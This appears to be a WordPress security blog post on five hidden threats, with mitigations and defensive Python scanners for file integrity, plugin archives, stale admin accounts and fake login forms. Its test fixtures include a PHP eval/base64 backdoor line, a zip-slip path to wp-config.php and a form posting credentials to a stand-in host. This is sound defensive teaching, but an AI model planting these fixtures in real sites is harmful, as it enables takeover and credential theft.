Navigating the dark web: Protecting your site from hidden threats

WPAleks
Founder and CEO at WPPlaybook.net

Poor cyber hygiene
BIGGEST THREAT EVER
If you think you know everything about cyber security, you must be the biggest threat to your company.
Poor cyber hygiene covers everyday risky practices: weak or reused passwords, neglected security updates, clicking suspicious email links, and never putting basic controls in place. A recent study found that a large share of security breaches stem from poor cyber hygiene. To minimize the risk, prioritize strong, unique credentials for every account and make routine security housekeeping (updates, account reviews, backups) a habit rather than a one-off.
1.Favicon-based malware injection
2.Fake WordPress plugin updates (Supply chain attacks)
3.Abandoned admin accounts (Ghost admins)
4.Fake admin login pages
5.Hidden Malware in media files
Explanation
1.Favicon-based malware injection
Attackers hide malicious code inside files named favicon.ico or carrying an .ico extension: JavaScript for a browser-side skimmer or keylogger, or PHP for a server-side backdoor. A browser never executes an icon file on its own; the payload runs because the attacker also injects a <script> tag that loads the "icon" as JavaScript, or a PHP include that reads it. Because favicons are cached, almost never reviewed by a human, and often excluded from scans, the payload tends to go unnoticed for a long time.
Example attack scenario:
An attacker with write access to the site replaces favicon.ico with a file whose body is a credential-stealing script and adds a single line to the theme header that loads it. Visitors' browsers execute the script, and whatever they type into the login form is sent to the attacker.
Mitigation strategy
Use a Content Security Policy (CSP) header to restrict which origins may load JavaScript. Know its limit: CSP blocks a payload pulled from a host you did not allow, but a file planted on your own origin still passes script-src 'self', so CSP complements integrity checks rather than replacing them.
Regularly verify the integrity of files on your server using checksums or a file-monitoring tool. For code from WordPress.org, wp core verify-checksums and wp plugin verify-checksums compare against the published hashes; for your own theme assets, including the favicon, keep a baseline of your own.
Serve favicons and other static assets from a CDN or a repository that the web server's user cannot write to, instead of from a writable directory on the main server.
Restrict file upload permissions so that only trusted roles can add or replace static assets, and keep asset directories read-only for the web server process.
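The checksum mitigation above, as an added example that is not code from the original page: a small baseline-and-diff tool that records a SHA-256 manifest of every file under the web root and later reports what was modified, added or removed. The directory layout, the replaced favicon and the dropped backdoor file are all constructed stand-ins for the demonstration; the helper names (hash_file, build_manifest, diff_manifests) are the example's own.

```python
"""Baseline-and-diff integrity check for a site's static files.

Added example, not code from the original page: record a SHA-256 manifest of
every file under the web root while the site is known-good, store the manifest
where the web server cannot write, and diff a fresh manifest against it on a
schedule. A replaced favicon.ico shows up as "modified", a dropped backdoor as
"added". The directory layout and file contents below are constructed for the
demonstration.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large assets do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each file path (relative to root, POSIX style) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Classify every path as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def save_manifest(manifest: dict, dest: Path) -> None:
    # Keep the baseline outside the web root (better: on another host) so an
    # attacker who can write to the site cannot quietly re-baseline their changes.
    dest.write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(src: Path) -> dict:
    return json.loads(src.read_text())


def demo() -> dict:
    """Constructed scenario: take a baseline, then simulate the favicon swap from the text."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "htdocs"
        theme = root / "wp-content" / "themes" / "demo"
        theme.mkdir(parents=True)
        # A genuine ICO file begins with reserved word 0 and image type 1.
        (root / "favicon.ico").write_bytes(b"\x00\x00\x01\x00" + b"\x00" * 60)
        (theme / "style.css").write_text("body { margin: 0 }\n")
        (theme / "header.php").write_text("<?php wp_head(); ?>\n")

        baseline_path = Path(tmp) / "baseline.json"  # deliberately outside htdocs
        save_manifest(build_manifest(root), baseline_path)

        # Attacker swaps the favicon for a script-bearing file, edits the header
        # to load it, and drops a backdoor (constructed stand-ins, not real samples).
        (root / "favicon.ico").write_bytes(b"document.addEventListener('keydown', function (e) {});")
        (theme / "header.php").write_text('<?php wp_head(); ?>\n<script src="/favicon.ico"></script>\n')
        (theme / "wp-cache.php").write_text("<?php /* constructed backdoor stub */ ?>\n")

        return diff_manifests(load_manifest(baseline_path), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run build_manifest once on a clean deploy and again from cron; anything in "modified" under static asset directories is a change nobody should have made, and "added" files ending in .php under a theme or uploads directory deserve immediate attention. Re-baseline only after a deploy you performed yourself.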
2.Fake WordPress plugin updates (Supply chain attacks)
Attackers can trick WordPress users into installing malicious plugin updates by compromising a legitimate plugin's distribution channel (a developer account or update server) or by publishing fake versions of popular plugins.
Once installed, these updates can inject malware, steal user data, or create hidden backdoors for the attacker.
This scenario is especially common with so-called "GPL" or nulled plugin sites that redistribute premium plugins for free: the copy you download can have been modified before it ever reached you.
Example attack scenario:
You see an update notification for a plugin you use, but it’s a hacked version uploaded by an attacker. You update it, thinking it’s safe, but the new version adds a hidden admin user or steals information from your WooCommerce store.
Mitigation strategy
Download plugins only from trusted sources (WordPress.org, official developer websites, or reputable marketplaces like CodeCanyon).
Enable automatic updates only for plugins you trust, and test every other update before it reaches production, for example with WP-CLI on a staging copy or a staging workflow such as Cloudways SafeUpdates.
Monitor plugin changes with Wordfence or WP Activity Log so you are alerted when plugin files are modified.
Check plugin reviews and the changelog before applying an update; if something seems off (a new maintainer, an unexplained version jump, a changelog that does not match what changed), wait before updating.
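A concrete pre-install check for a plugin archive, as an added example that is not code from the page, WordPress, Wordfence or Cloudways. It pins the archive hash, rejects "zip slip" entries that would extract outside the plugin directory, and greps PHP files for the eval/base64 constructs that injected backdoors rely on. The zip is built in memory and the pinned hash is an assumed placeholder; inspect_plugin_zip and build_demo_zip are the example's own names.

```python
"""Pre-install inspection of a WordPress plugin zip.

Added example; not code from the page, WordPress, Wordfence or Cloudways.
Before trusting an update that did not come from a repository you control,
check (1) the archive's SHA-256 against a hash obtained out of band,
(2) "zip slip" entries that would write outside the plugin's own directory,
and (3) PHP files carrying obfuscation markers typical of injected backdoors.
The archive below is built in memory for the demo; the pinned hash is an
assumed placeholder, not a real release.
"""
import hashlib
import io
import re
import zipfile
from pathlib import PurePosixPath
from typing import Optional

# Constructs that are rare in honest plugin code but standard in PHP backdoors.
SUSPICIOUS_PHP = re.compile(
    rb"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\("
    rb"|create_function\s*\("
    rb"|\bassert\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
)


def inspect_plugin_zip(data: bytes, expected_sha256: Optional[str] = None) -> dict:
    """Return findings for a plugin archive given as raw bytes."""
    findings = {
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha256_mismatch": False,
        "zip_slip": [],
        "suspicious_php": [],
    }
    if expected_sha256 is not None and findings["sha256"] != expected_sha256.lower():
        findings["sha256_mismatch"] = True

    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Entries that would escape the extraction directory: absolute paths,
            # backslash separators, or any ".." component.
            if name.startswith("/") or "\\" in name or ".." in PurePosixPath(name).parts:
                findings["zip_slip"].append(name)
                continue
            if info.is_dir():
                continue
            if name.lower().endswith((".php", ".phtml", ".php5", ".phar")):
                if SUSPICIOUS_PHP.search(zf.read(info)):
                    findings["suspicious_php"].append(name)
    return findings


def _entry(name: str) -> zipfile.ZipInfo:
    """Fixed timestamp so the demo archive hashes identically on every run."""
    zi = zipfile.ZipInfo(name, date_time=(2020, 1, 1, 0, 0, 0))
    zi.compress_type = zipfile.ZIP_DEFLATED
    return zi


def build_demo_zip() -> bytes:
    """Constructed archive: one clean file, one backdoored file, one zip-slip entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(_entry("demo-plugin/demo-plugin.php"),
                    "<?php\n/* Plugin Name: Demo Plugin */\nadd_action('init', 'demo_init');\n")
        zf.writestr(_entry("demo-plugin/inc/helper.php"),
                    "<?php\nif (isset($_POST['k'])) { eval(base64_decode($_POST['k'])); }\n")
        zf.writestr(_entry("../../wp-config.php"),
                    "<?php /* would overwrite the real config on extraction */\n")
    return buf.getvalue()


def demo() -> dict:
    # Assumed pinned hash (all zeros) standing in for one you copied from the
    # developer's release notes; it will not match, which is the point.
    return inspect_plugin_zip(build_demo_zip(), expected_sha256="0" * 64)


if __name__ == "__main__":
    print(demo())
```

The regex is deliberately narrow: it will miss a backdoor that builds its function name at runtime, so treat a clean result as "nothing obvious" and still run the update on staging first. A hash mismatch alone is decisive and should end the review.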
3.Abandoned admin accounts (Ghost admins)
Over time, website owners and teams create multiple admin accounts for developers, contractors, or team members. If old accounts aren’t deleted, attackers can target them, especially if those users had weak or reused passwords.
Example attack scenario:
A former employee had an admin account that was never deleted. Attackers find it and use a leaked password from another data breach to log in and take over the site.
Mitigation strategy
Review all user accounts regularly; delete old admin accounts or downgrade them to a low-privilege role such as Subscriber.
Use a plugin like WP Security Audit Log (now WP Activity Log) to track logins and alert you when a long-inactive admin suddenly logs in.
Enable 2FA for all admin users so a leaked password alone is not enough to log in.
Automatically end idle sessions with a plugin like Inactive Logout, which limits how long a forgotten, still-logged-in session stays usable.
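The account review above, as an added example that is not code from the page or from any of the plugins it names. It takes records shaped like the output of wp user list --format=json and flags privileged accounts idle longer than a threshold. WordPress core does not store a last-login time, so the last_login field is an assumption (an activity-log plugin's user meta); the records themselves are constructed, and PRIVILEGED_ROLES and stale_privileged_users are the example's own names.

```python
"""Audit for abandoned privileged accounts ("ghost admins").

Added example, not code from the page or any plugin. Input is the kind of
record you get from `wp user list --format=json` (ID, user_login, user_email,
user_registered, roles), joined with a last-login timestamp. WordPress core
does not record last login; the `last_login` field is assumed to come from an
activity-log plugin's user meta, and the records are constructed for the demo.
"""
from datetime import datetime, timedelta, timezone
from typing import List, Optional

# Roles that can change code, content or orders; extend for your own custom roles.
PRIVILEGED_ROLES = {"administrator", "editor", "shop_manager"}


def _parse(ts: Optional[str]) -> Optional[datetime]:
    """WP-CLI prints naive 'YYYY-MM-DD HH:MM:SS' timestamps; treat them as UTC."""
    if not ts:
        return None
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)


def stale_privileged_users(users: List[dict], now: datetime, max_idle_days: int = 90) -> List[dict]:
    """Flag privileged users with no login inside max_idle_days.

    Accounts that never logged in are judged by their registration date, so a
    contractor account created a year ago and never used is still reported.
    """
    cutoff = now - timedelta(days=max_idle_days)
    flagged = []
    for u in users:
        roles = {r.strip() for r in u["roles"].split(",") if r.strip()}
        if not roles & PRIVILEGED_ROLES:
            continue
        last = _parse(u.get("last_login"))
        basis = "last login"
        if last is None:
            last = _parse(u["user_registered"])
            basis = "never logged in; registered"
        if last >= cutoff:
            continue
        flagged.append({
            "user_login": u["user_login"],
            "roles": sorted(roles),
            "idle_days": (now - last).days,
            "basis": basis,
            # WordPress offers to reassign content on delete; downgrade first if
            # you are not ready to decide who inherits the account's posts.
            "action": "delete or downgrade to subscriber",
        })
    return sorted(flagged, key=lambda f: -f["idle_days"])


SAMPLE_USERS = [  # constructed records, shaped like `wp user list --format=json` output
    {"ID": 1, "user_login": "owner", "user_email": "owner@example.com",
     "user_registered": "2019-03-01 10:00:00", "roles": "administrator",
     "last_login": "2024-05-30 08:15:00"},
    {"ID": 7, "user_login": "dev-contractor", "user_email": "dev@agency.example",
     "user_registered": "2022-08-10 12:00:00", "roles": "administrator",
     "last_login": "2023-11-02 17:41:00"},
    {"ID": 12, "user_login": "agency-temp", "user_email": "temp@agency.example",
     "user_registered": "2023-06-15 09:00:00", "roles": "administrator",
     "last_login": None},
    {"ID": 20, "user_login": "writer", "user_email": "writer@example.com",
     "user_registered": "2021-01-01 00:00:00", "roles": "author",
     "last_login": "2022-01-01 00:00:00"},
]


def demo() -> List[dict]:
    """Run the audit against the constructed records as of a fixed date."""
    return stale_privileged_users(SAMPLE_USERS, datetime(2024, 6, 1, tzinfo=timezone.utc))


if __name__ == "__main__":
    for f in demo():
        print(f)
```

The author account "writer" is older than both flagged admins but is not reported, which is intentional: the review is about privilege, not age. Feed the flagged logins to wp user delete or wp user set-role, and re-run after each contractor engagement ends.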
4.Fake admin login pages
Attackers can inject a fake WordPress login page into your site and trick you (or your team) into entering credentials. These credentials are then stolen and used to log in to your real WordPress dashboard.
Example attack scenario:
A hacked plugin or theme injects a fake WordPress login page at yourwebsite.com/wp-admin2. When you try to log in, your credentials are sent to an attacker.
Mitigation strategy
Always check the browser URL before logging in; your WordPress login should only ever be at yourwebsite.com/wp-admin or yourwebsite.com/wp-login.php (or the custom login URL you configured yourself).
Renaming the login URL with a plugin like WPS Hide Login means your team expects a non-default address, so a page at a guessable path like /wp-admin2 stands out. It does not stop an attacker who already has code execution on the site from adding a page, so treat it as a usability aid, not a security control.
Install a security plugin like Wordfence to detect injected files and unauthorized login pages.
Use a password manager to fill login credentials. It only offers saved credentials on the origin they were saved for, which defeats look-alike domains; it does not protect against a fake form injected on your own domain, so the URL check above still matters.
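A scanner for the injected-login-page case, as an added example that is not code from the page or from Wordfence. It parses a page's HTML, finds every form that contains a password field, resolves the form's action against the page URL, and reports any form that would send credentials to a different host or to a path other than the real login endpoint (including a renamed one). Both pages and the collector host are constructed; audit_login_forms is the example's own name.

```python
"""Detect login forms that post credentials somewhere other than the real login URL.

Added example, not code from the page or from Wordfence. It scans HTML for forms
containing a password field and reports any whose resolved action is not the
site's own login endpoint. Both the legitimate page and the fake /wp-admin2
page below are constructed; the collector host uses the reserved .invalid TLD.
"""
from html.parser import HTMLParser
from typing import List
from urllib.parse import urljoin, urlsplit


class _LoginFormFinder(HTMLParser):
    """Collect (action, has_password) for every <form> in a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "has_password": False}
        elif tag == "input" and self._current is not None and a.get("type", "").lower() == "password":
            self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def audit_login_forms(page_url: str, html: str, allowed_login_paths=("/wp-login.php",)) -> List[dict]:
    """Return one finding per credential form whose target is not an allowed login endpoint."""
    site_host = urlsplit(page_url).netloc.lower()
    finder = _LoginFormFinder()
    finder.feed(html)
    findings = []
    for form in finder.forms:
        if not form["has_password"]:
            continue
        # An empty action posts back to the page itself, which is exactly what a
        # fake page planted at /wp-admin2/ would rely on.
        target = urljoin(page_url, form["action"] or page_url)
        parts = urlsplit(target)
        off_site = parts.netloc.lower() != site_host
        wrong_path = parts.path not in allowed_login_paths
        if off_site or wrong_path:
            findings.append({"page": page_url, "posts_to": target,
                             "reason": "off-site host" if off_site else "unexpected path"})
    return findings


# Constructed pages standing in for fetched HTML.
REAL_LOGIN = """<html><body>
<form name="loginform" id="loginform" action="https://example.com/wp-login.php" method="post">
<input type="text" name="log"><input type="password" name="pwd"><input type="submit" name="wp-submit">
</form></body></html>"""

FAKE_LOGIN = """<html><body>
<form name="loginform" action="https://collector.invalid/steal.php" method="post">
<input type="text" name="log"><input type="password" name="pwd">
</form>
<form method="post"><!-- no action attribute: posts back to /wp-admin2/ itself -->
<input type="text" name="log"><input type="password" name="pwd">
</form></body></html>"""


def demo() -> dict:
    return {
        "real": audit_login_forms("https://example.com/wp-login.php", REAL_LOGIN),
        "fake": audit_login_forms("https://example.com/wp-admin2/", FAKE_LOGIN),
    }


if __name__ == "__main__":
    print(demo())
```

If you renamed the login URL, pass it in allowed_login_paths (for example ("/my-hidden-login",)) so the real page is not reported. In practice you would feed the scanner the HTML of every page a crawler finds under your site, not just the login page, since the injected page can live at any path.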
5.Hidden Malware in media files
Hackers often hide malicious code inside images, PDFs, or other media files uploaded to WordPress. On its own, a PHP payload inside a JPEG does nothing; it becomes dangerous when another injected file includes it, or when the web server can be made to execute files in the uploads directory (for example through a double extension like shell.php.jpg on a misconfigured handler, or a file that is really PHP despite its image extension). Until then the file sits unnoticed in the media library.
Example attack scenario:
An attacker uploads an infected PDF or image via a contact form or user-upload area. This file contains a hidden script that, when accessed, creates a backdoor or injects spammy links into your site.
Mitigation strategy
Limit file upload permissions—only allow trusted users to upload media files.
Use a malware scanner like WordFence or Sucuri to scan media files for hidden scripts.
Regularly review and delete unused files in the media library to reduce the risk of hidden threats.
Disable PHP execution in the uploads folder using .htaccess. The rules must go straight into wp-content/uploads/.htaccess without a <Directory> wrapper: <Directory> is only valid in the main Apache configuration, and Apache answers every request with a 500 error when it finds one in an .htaccess file. Use the Apache 2.4 syntax (Require) with a 2.2 fallback:
<IfModule mod_authz_core.c>
<FilesMatch "\.(php|phtml|phar|shtml|cgi|pl|exe|sh)$">
Require all denied
</FilesMatch>
</IfModule>
<IfModule !mod_authz_core.c>
<FilesMatch "\.(php|phtml|phar|shtml|cgi|pl|exe|sh)$">
Order Allow,Deny
Deny from all
</FilesMatch>
</IfModule>
This only takes effect where Apache honours .htaccess for that directory (AllowOverride). nginx ignores .htaccess files entirely and needs an equivalent deny rule for uploads in its own server block.
WRAPPING UP
Many WordPress security threats are not obvious at first but can have a major impact on your website. By actively monitoring your site, restricting permissions, and using security plugins, you can stay ahead of these hidden dangers.

CW Security
By Aleksandar Savkovic WPAleks